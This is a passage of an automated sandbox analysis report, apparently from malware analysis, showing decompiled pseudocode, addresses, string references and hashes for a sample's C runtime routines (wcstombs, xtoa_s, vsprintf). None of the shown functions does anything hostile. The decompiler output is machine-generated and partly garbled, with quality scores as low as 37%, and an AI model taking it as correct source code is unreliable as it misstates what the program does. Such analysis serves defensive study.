                            												_t274 =  *(_t247 + 4);
                            												 *((intOrPtr*)(_t292 - 0xc)) = WideCharToMultiByte( *(_t247 + 4), 0,  *(_t292 + 0xc), 1, _t292 - 0x2c,  *( *_t179 + 0xac), 0, _t292 - 0x10);
                            												if( *((intOrPtr*)(_t292 - 0xc)) == 0 ||  *(_t292 - 0x10) != 0) {
                            													 *((intOrPtr*)(L0040EC70(_t247))) = 0x2a;
                            													 *(_t292 - 0x50) = 0xffffffff;
                            													E0040D380(_t292 - 0x20);
                            													_t162 =  *(_t292 - 0x50);
                            												} else {
                            													if( *((intOrPtr*)(_t292 - 0xc)) < 0 ||  *((intOrPtr*)(_t292 - 0xc)) > 5) {
                            														 *((intOrPtr*)(L0040EC70(_t247))) = 0x2a;
                            														 *(_t292 - 0x54) = 0xffffffff;
                            														E0040D380(_t292 - 0x20);
                            														_t162 =  *(_t292 - 0x54);
                            													} else {
                            														if( *(_t292 - 4) +  *((intOrPtr*)(_t292 - 0xc)) <=  *(_t292 + 0x10)) {
                            															 *(_t292 - 8) = 0;
                            															while( *(_t292 - 8) <  *((intOrPtr*)(_t292 - 0xc))) {
                            																( *(_t292 + 8))[ *(_t292 - 4)] =  *((intOrPtr*)(_t292 +  *(_t292 - 8) - 0x2c));
                            																_t274 =  &(( *(_t292 + 8))[ *(_t292 - 4)]);
                            																if(( *(_t292 + 8))[ *(_t292 - 4)] != 0) {
                            																	 *(_t292 - 8) =  *(_t292 - 8) + 1;
                            																	 *(_t292 - 4) =  *(_t292 - 4) + 1;
                            																	continue;
                            																}
                            																 *(_t292 - 0x5c) =  *(_t292 - 4);
                            																E0040D380(_t292 - 0x20);
                            																_t162 =  *(_t292 - 0x5c);
                            																goto L55;
                            															}
                            															_t274 =  &(( *(_t292 + 0xc))[1]);
                            															 *(_t292 + 0xc) =  &(( *(_t292 + 0xc))[1]);
                            															continue;
                            														}
                            														 *(_t292 - 0x58) =  *(_t292 - 4);
                            														E0040D380(_t292 - 0x20);
                            														_t162 =  *(_t292 - 0x58);
                            													}
                            												}
                            												goto L55;
                            											}
                            											 *(_t292 - 0x60) =  *(_t292 - 4);
                            											E0040D380(_t292 - 0x20);
                            											_t162 =  *(_t292 - 0x60);
                            										}
                            									} else {
                            										 *(_t292 - 0x48) =  *(_t292 - 4) - 1;
                            										E0040D380(_t292 - 0x20);
                            										_t162 =  *(_t292 - 0x48);
                            									}
                            									goto L55;
                            								}
                            								if( *(_t292 + 0x10) > 0) {
                            									 *(_t292 + 0x10) = E0041DF50( *(_t292 + 0xc),  *(_t292 + 0x10));
                            								}
                            								_t274 =  *(_t292 + 0xc);
                            								_t201 =  *((intOrPtr*)(E0040D3B0(_t292 - 0x20)));
                            								_t260 =  *(_t201 + 4);
                            								 *(_t292 - 4) = WideCharToMultiByte( *(_t201 + 4), 0,  *(_t292 + 0xc),  *(_t292 + 0x10),  *(_t292 + 8),  *(_t292 + 0x10), 0, _t292 - 0x10);
                            								if( *(_t292 - 4) == 0 ||  *(_t292 - 0x10) != 0) {
                            									 *((intOrPtr*)(L0040EC70(_t260))) = 0x2a;
                            									 *(_t292 - 0x44) = 0xffffffff;
                            									E0040D380(_t292 - 0x20);
                            									_t162 =  *(_t292 - 0x44);
                            								} else {
                            									if( *((char*)( &(( *(_t292 + 8))[ *(_t292 - 4)]) - 1)) == 0) {
                            										 *(_t292 - 4) =  *(_t292 - 4) - 1;
                            									}
                            									_t274 =  *(_t292 - 4);
                            									 *(_t292 - 0x40) =  *(_t292 - 4);
                            									E0040D380(_t292 - 0x20);
                            									_t162 =  *(_t292 - 0x40);
                            								}
                            								goto L55;
                            							} else {
                            								goto L10;
                            							}
                            							while(1) {
                            								L10:
                            								_t265 =  *(_t292 - 4);
                            								if( *(_t292 - 4) >=  *(_t292 + 0x10)) {
                            									break;
                            								}
                            								_t274 =  *(_t292 + 0xc);
                            								if(( *( *(_t292 + 0xc)) & 0x0000ffff) <= 0xff) {
                            									( *(_t292 + 8))[ *(_t292 - 4)] =  *( *(_t292 + 0xc));
                            									_t274 =  *( *(_t292 + 0xc)) & 0x0000ffff;
                            									 *(_t292 + 0xc) =  &(( *(_t292 + 0xc))[1]);
                            									if(( *( *(_t292 + 0xc)) & 0x0000ffff) != 0) {
                            										_t274 =  *(_t292 - 4) + 1;
                            										 *(_t292 - 4) =  *(_t292 - 4) + 1;
                            										continue;
                            									}
                            									 *(_t292 - 0x38) =  *(_t292 - 4);
                            									E0040D380(_t292 - 0x20);
                            									_t162 =  *(_t292 - 0x38);
                            									goto L55;
                            								}
                            								 *((intOrPtr*)(L0040EC70(_t265))) = 0x2a;
                            								 *(_t292 - 0x34) = 0xffffffff;
                            								E0040D380(_t292 - 0x20);
                            								_t162 =  *(_t292 - 0x34);
                            								goto L55;
                            							}
                            							 *(_t292 - 0x3c) =  *(_t292 - 4);
                            							E0040D380(_t292 - 0x20);
                            							_t162 =  *(_t292 - 0x3c);
                            						}
                            					} else {
                            						 *((intOrPtr*)(L0040EC70(_t222))) = 0x16;
                            						_t162 = E00411A50(_t221, _t222, _t290, _t291, L"pwcs != NULL", L"_wcstombs_l_helper", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x66, 0) | 0xffffffff;
                            					}
                            					goto L55;
                            				} else {
                            					_t162 = 0;
                            					L55:
                            					return E00416CA0(_t162, _t221,  *(_t292 - 0x24) ^ _t292, _t274, _t290, _t291);
                            				}
                            			}

















                            0x0041dae6
                            0x0041dae6
                            0x0041dae6
                            0x0041daea
                            0x0041dafc
                            0x0041db03
                            0x0041db05
                            0x0041db0a
                            0x0041db0c
                            0x0041db0e
                            0x0041db13
                            0x0041db15
                            0x0041db1a
                            0x0041db20
                            0x0041db22
                            0x0041db22
                            0x0041db20
                            0x0041db27
                            0x0041db57
                            0x0041db5e
                            0x0041db67
                            0x0041de9e
                            0x0041dea3
                            0x0041dea9
                            0x0041dedb
                            0x0041dede
                            0x0041dee3
                            0x0041deef
                            0x0041def6
                            0x0041df03
                            0x0041df09
                            0x0041df13
                            0x0041df18
                            0x0041df1d
                            0x0041df23
                            0x0041df29
                            0x0041df2e
                            0x0041df2e
                            0x0041deab
                            0x0041deab
                            0x0041deb7
                            0x0041debd
                            0x0041dec2
                            0x0041dec2
                            0x0041db6d
                            0x0041db7b
                            0x0041dc25
                            0x0041dcf1
                            0x0041dcf3
                            0x0041dcfd
                            0x0041dd04
                            0x0041dd29
                            0x0041dd3b
                            0x0041dd41
                            0x0041dd4b
                            0x0041dd50
                            0x0041dd58
                            0x0041dd58
                            0x0041dd6d
                            0x0041dd8f
                            0x0041dd91
                            0x0041dd9b
                            0x0041dda2
                            0x0041ddaf
                            0x0041ddb5
                            0x0041ddbf
                            0x0041ddc4
                            0x0041ddcc
                            0x0041ddd0
                            0x0041dddd
                            0x0041dde3
                            0x0041dded
                            0x0041ddf2
                            0x0041ddfa
                            0x0041de03
                            0x0041de1b
                            0x0041de36
                            0x0041de4b
                            0x0041de50
                            0x0041de58
                            0x0041de2a
                            0x0041de33
                            0x00000000
                            0x0041de33
                            0x0041de5d
                            0x0041de63
                            0x0041de68
                            0x00000000
                            0x0041de68
                            0x0041de75
                            0x0041de78
                            0x00000000
                            0x0041de78
                            0x0041de08
                            0x0041de0e
                            0x0041de13
                            0x0041de13
                            0x0041ddd0
                            0x00000000
                            0x0041dda2
                            0x0041de83
                            0x0041de89
                            0x0041de8e
                            0x0041de8e
                            0x0041dd0c
                            0x0041dd12
                            0x0041dd18
                            0x0041dd1d
                            0x0041dd1d
                            0x00000000
                            0x0041dd04
                            0x0041dc2f
                            0x0041dc41
                            0x0041dc41
                            0x0041dc56
                            0x0041dc64
                            0x0041dc66
                            0x0041dc70
                            0x0041dc77
                            0x0041dcb1
                            0x0041dcb7
                            0x0041dcc1
                            0x0041dcc6
                            0x0041dc7f
                            0x0041dc8b
                            0x0041dc93
                            0x0041dc93
                            0x0041dc96
                            0x0041dc99
                            0x0041dc9f
                            0x0041dca4
                            0x0041dca4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0041db81
                            0x0041db81
                            0x0041db81
                            0x0041db87
                            0x00000000
                            0x00000000
                            0x0041db89
                            0x0041db94
                            0x0041dbc3
                            0x0041dbc8
                            0x0041dbd1
                            0x0041dbd6
                            0x0041dbf1
                            0x0041dbf4
                            0x00000000
                            0x0041dbf4
                            0x0041dbdb
                            0x0041dbe1
                            0x0041dbe6
                            0x00000000
                            0x0041dbe6
                            0x0041db9b
                            0x0041dba1
                            0x0041dbab
                            0x0041dbb0
                            0x00000000
                            0x0041dbb0
                            0x0041dbfc
                            0x0041dc02
                            0x0041dc07
                            0x0041dc07
                            0x0041db29
                            0x0041db2e
                            0x0041db4f
                            0x0041db4f
                            0x00000000
                            0x0041daec
                            0x0041daec
                            0x0041df3b
                            0x0041df48
                            0x0041df48

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041DB47
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __invalid_parameter
                            • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$pwcs != NULL
                            • API String ID: 3730194576-2632876063
                            • Opcode ID: 566d9d42dcf31c5855311778aa41cbc017b8c7581bc19c1412051696f35e9765
                            • Instruction ID: 07a12f909f92b034a60d311c56d3d9fcb57e7cbb446dde79f24c9245b4a995d4
                            • Opcode Fuzzy Hash: 566d9d42dcf31c5855311778aa41cbc017b8c7581bc19c1412051696f35e9765
                            • Instruction Fuzzy Hash: 63F0C8B0F98308BAEB20AE60CC03B9E36506B14768F11052BF407352C2D3BD5790CA5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041D7AC
                              • Part of subcall function 00411A50: __encode_pointer.LIBCMTD ref: 00411A62
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __encode_pointer__invalid_parameter
                            • String ID: buf != NULL$f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c$xtoa_s
                            • API String ID: 1891725282-2409497104
                            • Opcode ID: d2bdb250bb8a3d086e99092350d04cb397b5c80925b06a7963bd95bec98ddc70
                            • Instruction ID: c3a3a00e246c73098093f5b196c7d583bd9402844ce9ee23c23fb16fae2947f0
                            • Opcode Fuzzy Hash: d2bdb250bb8a3d086e99092350d04cb397b5c80925b06a7963bd95bec98ddc70
                            • Instruction Fuzzy Hash: CAD02EB4FAC3C216D21292180C12B69BE004B41328F2903DBA482254E3C69E08A0A27B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E0041C504(void* __edx) {
                            				void* _t62;
                            
                            				asm("clc");
                            				 *((intOrPtr*)(_t62 + 0x31)) =  *((intOrPtr*)(_t62 + 0x31)) + __edx;
                            			}




                            0x0041c504
                            0x0041c505

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041C529
                              • Part of subcall function 00411A50: __encode_pointer.LIBCMTD ref: 00411A62
                            Strings
                            • _vsprintf_s_l, xrefs: 0041C51F
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c, xrefs: 0041C51A
                            • format != NULL, xrefs: 0041C524
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __encode_pointer__invalid_parameter
                            • String ID: _vsprintf_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c$format != NULL
                            • API String ID: 1891725282-3037862745
                            • Opcode ID: 322b760685bc80613662205eeefc6cc80aca62a44ff867e95991e471e14ff72c
                            • Instruction ID: 628037e800aa410f24e47f392bda50ec61bd8dffc0b11d5c797509e737c37f73
                            • Opcode Fuzzy Hash: 322b760685bc80613662205eeefc6cc80aca62a44ff867e95991e471e14ff72c
                            • Instruction Fuzzy Hash: 21D0A730ECC34436E1206A254C03B9439004B027B8F210A97B82A350D3D5FA1850065F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041EDCC
                              • Part of subcall function 00411A50: __encode_pointer.LIBCMTD ref: 00411A62
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __encode_pointer__invalid_parameter
                            • String ID: buf != NULL$f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c$xtow_s
                            • API String ID: 1891725282-2536889810
                            • Opcode ID: 35cc88a0cabb80403438ba4f7531a9bda5d4c9fd4119f80382a4b051a03fa730
                            • Instruction ID: db9059bc8f816e3dba32da687808bbf188126d26b6403a916222724d74c78c3e
                            • Opcode Fuzzy Hash: 35cc88a0cabb80403438ba4f7531a9bda5d4c9fd4119f80382a4b051a03fa730
                            • Instruction Fuzzy Hash: E1D097A1FDD3C52BD210A2100C23B407E400751734F2843EBEA833A1D3E08E08A0832B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0041D8AE(void* __edx) {
                            				void* _t86;
                            
                            				 *((intOrPtr*)(_t86 + 0x30)) =  *((intOrPtr*)(_t86 + 0x30)) + __edx;
                            			}




                            0x0041d8ae

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041D8CF
                              • Part of subcall function 00411A50: __encode_pointer.LIBCMTD ref: 00411A62
                            Strings
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c, xrefs: 0041D8C0
                            • xtoa_s, xrefs: 0041D8C5
                            • sizeInTChars > (size_t)(is_neg ? 2 : 1), xrefs: 0041D8CA
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __encode_pointer__invalid_parameter
                            • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c$sizeInTChars > (size_t)(is_neg ? 2 : 1)$xtoa_s
                            • API String ID: 1891725282-3452215162
                            • Opcode ID: d0a270f899788e98081a47b08cf84b2f04e990bf1cc3c9592250918596ff388d
                            • Instruction ID: 5a7c816d186596320a1e383f5ad7e6c14c14821dc40c5b7d97638e9195be10ea
                            • Opcode Fuzzy Hash: d0a270f899788e98081a47b08cf84b2f04e990bf1cc3c9592250918596ff388d
                            • Instruction Fuzzy Hash: 49D0A9F1ACC28436F210A6808C03F613A008B01B48F2001ABBA023A1E3C2BE182052AF
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0041D92A(void* __edx) {
                            				void* _t76;
                            
                            				 *((intOrPtr*)(_t76 + 0x30)) =  *((intOrPtr*)(_t76 + 0x30)) + __edx;
                            			}




                            0x0041d92a

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041D94B
                              • Part of subcall function 00411A50: __encode_pointer.LIBCMTD ref: 00411A62
                            Strings
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c, xrefs: 0041D93C
                            • 2 <= radix && radix <= 36, xrefs: 0041D946
                            • xtoa_s, xrefs: 0041D941
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __encode_pointer__invalid_parameter
                            • String ID: 2 <= radix && radix <= 36$f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c$xtoa_s
                            • API String ID: 1891725282-3387664789
                            • Opcode ID: b49177a0045a0007ece1540ea11b4fc2d3c04cc8c409c70db49722d608d75168
                            • Instruction ID: 92ce1eaebc2c1a833829505997e160737258d0c31aa558e0215d0a38c1a538a4
                            • Opcode Fuzzy Hash: b49177a0045a0007ece1540ea11b4fc2d3c04cc8c409c70db49722d608d75168
                            • Instruction Fuzzy Hash: EAD0C7F1FDD24825F621A6515C03F953A005B12749F1101ABB906391D3D5BE5460627F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0041C585(void* __edx) {
                            				void* _t52;
                            
                            				 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + __edx;
                            			}




                            0x0041c585

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041C5A9
                              • Part of subcall function 00411A50: __encode_pointer.LIBCMTD ref: 00411A62
                            Strings
                            • _vsprintf_s_l, xrefs: 0041C59F
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c, xrefs: 0041C59A
                            • string != NULL && sizeInBytes > 0, xrefs: 0041C5A4
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __encode_pointer__invalid_parameter
                            • String ID: _vsprintf_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                            • API String ID: 1891725282-654162117
                            • Opcode ID: 7fe7b2465ef742eac8168ada1e321872cddadd621cc3d591acd450b18f45787a
                            • Instruction ID: 4dacf4282536173bffe575c6138c64a513d4483f34700c933e6c95b6d7ef8e9b
                            • Opcode Fuzzy Hash: 7fe7b2465ef742eac8168ada1e321872cddadd621cc3d591acd450b18f45787a
                            • Instruction Fuzzy Hash: B3D0A930ECC34432E2206A254C03B9839004B12BB8F210AABB82A390D3DAFA28500A5F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0041EE0D(void* __edx) {
                            				void* _t102;
                            
                            				 *((intOrPtr*)(_t102 + 0x30)) =  *((intOrPtr*)(_t102 + 0x30)) + __edx;
                            			}




                            0x0041ee0d

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041EE2E
                              • Part of subcall function 00411A50: __encode_pointer.LIBCMTD ref: 00411A62
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __encode_pointer__invalid_parameter
                            • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c$sizeInTChars > 0$xtow_s
                            • API String ID: 1891725282-3498855903
                            • Opcode ID: 1840e0a3095f99ae0edfec1b730a8e068079f152657af4a486b2479273f79c49
                            • Instruction ID: f0bf477a47c99ca63e0d992981e8ac52a660d154a018b90736f974092d70032b
                            • Opcode Fuzzy Hash: 1840e0a3095f99ae0edfec1b730a8e068079f152657af4a486b2479273f79c49
                            • Instruction Fuzzy Hash: E0D0A7B1BCC24831F22056445C03F952D004701748F1000ABF9023A1D3C1BF1460526B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0041EED2(void* __edx) {
                            				void* _t84;
                            
                            				 *((intOrPtr*)(_t84 + 0x30)) =  *((intOrPtr*)(_t84 + 0x30)) + __edx;
                            			}




                            0x0041eed2

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041EEF3
                              • Part of subcall function 00411A50: __encode_pointer.LIBCMTD ref: 00411A62
                            Strings
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c, xrefs: 0041EEE4
                            • sizeInTChars > (size_t)(is_neg ? 2 : 1), xrefs: 0041EEEE
                            • xtow_s, xrefs: 0041EEE9
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __encode_pointer__invalid_parameter
                            • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c$sizeInTChars > (size_t)(is_neg ? 2 : 1)$xtow_s
                            • API String ID: 1891725282-3580838072
                            • Opcode ID: afa398a1a3961c252205402fa949022d0487cbc946a51a9879f306f4dca6f294
                            • Instruction ID: 8a62ed627fc42f169bb6c9f5f14839390a3d55d7adab433dad4f86b9f2e41c9d
                            • Opcode Fuzzy Hash: afa398a1a3961c252205402fa949022d0487cbc946a51a9879f306f4dca6f294
                            • Instruction Fuzzy Hash: 8DD0A9B1BCC28436F21066808C03F912E008B01B04F2040ABFA023A2D3C2BE186082AB
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0041D7ED(void* __edx) {
                            				void* _t104;
                            
                            				 *((intOrPtr*)(_t104 + 0x30)) =  *((intOrPtr*)(_t104 + 0x30)) + __edx;
                            			}




                            0x0041d7ed

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041D80E
                              • Part of subcall function 00411A50: __encode_pointer.LIBCMTD ref: 00411A62
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __encode_pointer__invalid_parameter
                            • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c$sizeInTChars > 0$xtoa_s
                            • API String ID: 1891725282-3358036509
                            • Opcode ID: 36f2c834f24085adde040b745e4e66c097c19a790211469810769180e1c808b0
                            • Instruction ID: 56c9fd98e9927e458d6694c38ce333e52e3baf99f138fe1bd735b19087b51392
                            • Opcode Fuzzy Hash: 36f2c834f24085adde040b745e4e66c097c19a790211469810769180e1c808b0
                            • Instruction Fuzzy Hash: F0D0C9F5EDD28866F620AA555C03FA63A004B11B88F2111ABB9463A1E3D6BE5460627F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0041EF51() {
                            				void* _t4;
                            				void* _t5;
                            				void* _t6;
                            				void* _t7;
                            
                            				 *((intOrPtr*)(L0040EC70(_t5))) = 0x16;
                            				E00411A50(_t4, _t5, _t6, _t7, L"2 <= radix && radix <= 36", L"xtow_s", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\xtoa.c", 0x6a, 0);
                            				return 0x16;
                            			}







                            0x0041ef56
                            0x0041ef6f
                            0x0041f0e4

                            APIs
                            • __invalid_parameter.LIBCMTD ref: 0041EF6F
                              • Part of subcall function 00411A50: __encode_pointer.LIBCMTD ref: 00411A62
                            Strings
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c, xrefs: 0041EF60
                            • 2 <= radix && radix <= 36, xrefs: 0041EF6A
                            • xtow_s, xrefs: 0041EF65
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
